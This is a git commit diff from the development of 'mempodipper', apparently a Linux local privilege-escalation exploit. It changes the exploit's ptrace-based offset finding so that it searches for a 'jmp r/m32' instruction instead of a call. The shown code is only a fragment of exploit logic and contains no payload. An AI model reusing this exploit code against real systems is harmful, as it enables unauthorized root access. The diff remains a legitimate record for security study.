authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 17:38:32 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 18:12:08 +0100
commit513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d (patch)
tree8d22ee73ab5d88ec5fae5b661b3795cb95eb870b
parentNot always exit@plt (diff)
Search for IP of next jmp instead.
-rw-r--r--mempodipper.c10
-rw-r--r--ptrace-offset-finder.c9
2 files changed, 6 insertions, 13 deletions
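--- a/mempodipper.c
+++ b/mempodipper.c
@@ -17,7 +17,6 @@
 #define _LARGEFILE64_SOURCE
 #include <stdio.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdlib.h>
 #include <sys/types.h>
@@ -126,12 +125,9 @@ unsigned long ptrace_address()
 #error "That platform is not supported."
 #endif
 if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- return instruction_pointer + offset;
- }
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+ return instruction_pointer;
 }
 }
 } else {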
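--- a/ptrace-offset-finder.c
+++ b/ptrace-offset-finder.c
@@ -1,6 +1,5 @@
 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <errno.h>
 #include <unistd.h>
@@ -41,11 +40,9 @@ int main(int argc, char *argv[])
 #error "That platform is not supported."
 #endif
 if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- printf("0x%lx\n", instruction_pointer + offset);
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) {
+ printf("0x%lx\n", instruction_pointer);
 break;
 }
 }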